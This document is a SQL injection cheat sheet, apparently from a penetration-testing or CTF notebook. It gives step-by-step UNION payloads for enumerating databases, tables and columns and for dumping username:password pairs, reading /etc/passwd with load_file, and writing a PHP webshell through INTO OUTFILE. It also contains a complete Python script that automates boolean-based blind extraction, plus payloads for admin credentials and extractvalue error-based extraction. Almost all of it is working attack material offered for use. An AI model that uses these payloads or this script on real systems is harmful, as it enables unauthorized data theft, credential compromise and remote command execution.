SQL INJECTION

1

Find the number of columns (raise the ORDER BY index until the query errors; the last value that works is the column count, and every UNION payload below must select exactly that many columns)

' union select 1,2-- -
' union select NULL,NULL-- -
' order by 5-- -
2

List the databases

' union select schema_name,NULL from information_schema.schemata-- -
' union select group_concat(schema_name),NULL from information_schema.schemata-- -
' union select schema_name,NULL from information_schema.schemata limit 0,1-- -

// SQLite
' or 1=1 UNION SELECT tbl_name ,NULL,NULL,NULL,NULL FROM sqlite_master--
' or 1=1 UNION SELECT sql ,NULL,NULL,NULL,NULL FROM sqlite_master--
' or 1=1 UNION SELECT flag,NULL,value,NULL,NULL FROM secret_flag--
3

List the tables

' union select table_name,NULL from information_schema.tables where table_schema='<name>'--
' union select table_name,NULL from information_schema.tables where table_schema='<name>' limit 0,1--
4

List the columns

' union select column_name,NULL from information_schema.columns where table_name='<name>'--
' union select column_name,NULL from information_schema.columns where table_name='<name>' limit 0,1--
5

List the content

' union select concat(username,":",password) from users-- -
' union select concat(username,0x3a,password) from users-- -
// PostgreSQL / SQLite: || concatenates (in MySQL || is a logical OR unless PIPES_AS_CONCAT is set)
' union select username||':'||password from users-- -
6

Read Files (MySQL: load_file() needs the FILE privilege and a path allowed by secure_file_priv; otherwise it silently returns NULL)

' or 1=1 UNION SELECT load_file("/etc/passwd"),NULL,NULL,NULL,NULL--

If quotes are filtered or the path does not work, pass it as an unquoted 0x-prefixed hex literal:

echo "/etc/passwd" | tr -d '\n' | xxd -ps
' or 1=1 UNION SELECT load_file(0x2f6574632f706173737764),NULL,NULL,NULL,NULL--
7

Write Files (MySQL INTO OUTFILE: needs the FILE privilege, a secure_file_priv-allowed directory writable by the mysqld user, and the target file must not already exist; the webshell only runs if that directory is served by the web server)

' or 1=1 UNION SELECT "test",NULL,NULL,NULL,NULL into outfile "/var/www/html/test.txt"--
' or 1=1 UNION SELECT "<?php system($_GET['cmd']);?>",NULL,NULL,NULL,NULL into outfile "/var/www/html/webshell.php"--

Blind SQL injection (boolean-based)

Assume a boolean-based blind SQL injection has been found: the response differs depending on whether the injected condition is true. The script below extracts the database name one character at a time with substring(), sending one request per candidate character and position:

#!/usr/bin/env python3

import requests
import signal
import time
import pdb
import sys
import string

from pwn import *
from termcolor import colored

def def_handler(sig, frame):
	"""SIGINT handler: print a red exit banner and terminate with status 1.

	``sig`` and ``frame`` are the standard signal-handler arguments; neither
	is used. Registered for Ctrl+C further down in the script.
	"""
	banner = colored("\n\n[!] Exit...\n", 'red')
	print(banner)
	sys.exit(1)

# Ctrl + C: route SIGINT to def_handler so an interrupted brute force prints
# the exit banner and exits with status 1 instead of a KeyboardInterrupt trace.
signal.signal(signal.SIGINT, def_handler)

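# Session cookies sent with every request; fill in the values of the
# authenticated session the injectable endpoint expects.
cookies = {
	'<cookie1>': '<value1>',
	'<cookie2>': '<value2>'
}

# Candidate characters, tried in order at every position.  Digits are included
# because schema/table/column names and password hashes routinely contain them;
# without them the extraction silently stops at the first digit.  Uppercase is
# not needed against MySQL's default case-insensitive collation (a lowercase
# guess matches an uppercase character); wrap the target in BINARY when case
# matters, as the password payload further down does.
characters = string.ascii_lowercase + string.digits + '-_,'

# Injectable endpoint (POST target).
main_url = "<url>"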

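def makeSQL(payload_template=None, true_marker=None, charset=None, max_len=49, timeout=10):
	"""Extract a string character by character through a boolean-based blind SQLi.

	Each position is brute forced with one POST per candidate character; the
	injected condition is true when the guess matches, which the application
	reveals by including ``true_marker`` in its response body.

	Args:
		payload_template: injection payload with ``{pos}`` and ``{character}``
			placeholders (``str.format`` syntax).  Defaults to extracting
			``database()``; the table/column/row payloads shown after the script
			plug in here unchanged.
		true_marker: substring that only appears in the response when the
			injected condition is true.  Defaults to the placeholder text, which
			must be replaced with the real marker before use.
		charset: candidate characters, tried in order.  Defaults to the
			module-level ``characters``.
		max_len: maximum number of characters to extract (the original loop
			bound of 49).
		timeout: per-request timeout in seconds, so a stalled target cannot
			hang the extraction forever.

	Returns:
		The extracted string.  Empty when no character matched at the first
		position, which usually means ``true_marker`` or ``charset`` is wrong.
		Note that any non-matching response (including an error page) counts
		as "false", so a broken target yields a truncated result rather than
		an exception.
	"""
	if payload_template is None:
		payload_template = "'or substring(database(),{pos},1)='{character}'-- -"
	if true_marker is None:
		true_marker = "<test displayed when sql is true>"
	if charset is None:
		charset = characters

	p1 = log.progress("Brute Force")
	p1.status("Starting...")
	p2 = log.progress("Database")

	extracted = ""
	for pos in range(1, max_len + 1):
		for character in charset:
			post_data = {
				'<parameter1>': '<value1>',
				"<parameter2>": payload_template.format(pos=pos, character=character),
			}
			p1.status(f"Trying with {character}")
			r = requests.post(main_url, data=post_data, cookies=cookies, timeout=timeout)
			if true_marker in r.text:
				extracted += character
				p2.status(extracted)
				break
		else:
			# No candidate matched at this position: either the string ended or
			# the next character is outside ``charset``.  Later positions cannot
			# match either, so stop instead of spending len(charset) requests on
			# every remaining position.
			break

	if extracted:
		p1.success("Done")
		p2.success(extracted)
	else:
		p1.failure("No character matched at position 1 - check true_marker and charset")
	return extracted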
		


# Entry point: run the extraction with the default payload (database name).
if __name__ == '__main__':

	makeSQL()

To extract the table names instead, only the injection payload changes:

'or substring((select group_concat(table_name) from information_schema.tables where table_schema='<database_name>'),{pos},1)='{character}'-- -

Let's retrieve the columns of a table:

'or substring((select group_concat(column_name) from information_schema.columns where table_name='<table>'),{pos},1)='{character}'-- -

Retrieve usernames and passwords (BINARY forces a case-sensitive comparison, since MySQL's default collation would otherwise match 'a' and 'A' alike and hashes would come back lowercased):

'or substring((select group_concat((BINARY username),':',(BINARY password)) from admin_users),{pos},1)='{character}'-- -

XPATH Injection

Error-based extraction through extractvalue() is an option when the application reflects MySQL error messages in its response (a telltale sign is seeing database errors such as "Unknown column" when you inject). The result of the injected subquery is carried out inside the XPath syntax error message. Despite the heading, this is MySQL error-based SQL injection, not injection into an XPath query.

The double quote in the example query matters: this time we are injecting into a string literal delimited by double quotes, so the payload has to open with a double quote to break out of it.

select path from pages where view="<our_input_here>" limit 1,1;

Exploitation

" and extractvalue(0x0a,concat(0x0a,(OUR_QUERY)))-- -

The opening quote must match the one in the vulnerable query (double quote here), and the trailing comment swallows the original ` limit 1,1` so the statement still parses; otherwise MySQL raises a syntax error before extractvalue() ever runs. extractvalue() only reports the first 32 characters of the offending value, so page through longer results with substring()/limit.
